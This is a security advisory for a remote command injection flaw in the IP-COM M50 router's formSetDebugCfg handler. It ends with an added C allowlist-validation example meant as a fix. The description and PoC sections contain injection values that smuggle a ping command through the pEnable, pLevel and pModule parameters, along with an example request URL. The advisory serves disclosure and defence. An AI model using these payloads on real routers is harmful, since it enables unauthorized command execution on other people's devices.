ip-com-2

vendor: IP-COM

product: M50

version: V15.11.0.33(10768)

type: Remote Command Injection

author: Yifeng Li, Wolin Zhuang

Vulnerability description

We found a command injection vulnerability in IP-COM Technology's M50 routers with recently released firmware. It allows remote attackers to execute arbitrary OS commands through a crafted GET request.

Remote Command Injection vulnerability

In the formSetDebugCfg function, the parameters "pEnable", "pLevel" and "pModule" are taken from strings delivered by the user and are not filtered, so we can set pEnable to a value such as "-h%0aping%20x.x.x.x%20-w%2-5%0a" to run commands on the OS. pLevel and pModule can be controlled to attack it in the same way.

PoC

Remote Command Injection

We set the value of "pEnable", "pLevel" or "pModule" to aaa;ping x.x.x.x; and the router will execute the ping command.

example.com/action/setDebugCfg?enable=-h ping x.x.x.x -w%2-5
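The missing filter in formSetDebugCfg can be closed with strict allowlist validation of the three values before they are used. The following is an added example, not the vendor's code or a vendor patch; the accepted value formats (enable as 0/1, level as 0..7, module as a short identifier) and all function names are assumptions, since the page does not document them.

```c
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Assumed value formats (not taken from the firmware): enable is "0" or "1",
 * level is an integer 0..7, module is a short [A-Za-z0-9_] name. */

/* Accept exactly "0" or "1". */
int valid_enable(const char *s)
{
    return s && (strcmp(s, "0") == 0 || strcmp(s, "1") == 0);
}

/* Accept a decimal integer in [0, 7] with no sign, spaces or trailing bytes. */
int valid_level(const char *s)
{
    char *end;
    long v;

    if (!s || !isdigit((unsigned char)s[0]))
        return 0;
    errno = 0;
    v = strtol(s, &end, 10);
    return errno == 0 && *end == '\0' && v >= 0 && v <= 7;
}

/* Accept 1..32 characters from [A-Za-z0-9_]; everything else, including
 * ';', spaces, '-' and newline (%0a once URL-decoded), is rejected. */
int valid_module(const char *s)
{
    size_t n;

    if (!s)
        return 0;
    n = strlen(s);
    if (n == 0 || n > 32)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)s[i]) && s[i] != '_')
            return 0;
    return 1;
}

/* Returns 1 only when all three values pass. On 0 the handler should refuse
 * the request; it should never concatenate these values into a shell string. */
int debug_cfg_args_ok(const char *enable, const char *level, const char *module)
{
    return valid_enable(enable) && valid_level(level) && valid_module(module);
}
```

Validation of this kind works best together with passing the values as separate argv entries to an exec-family call instead of building a string for system() or popen().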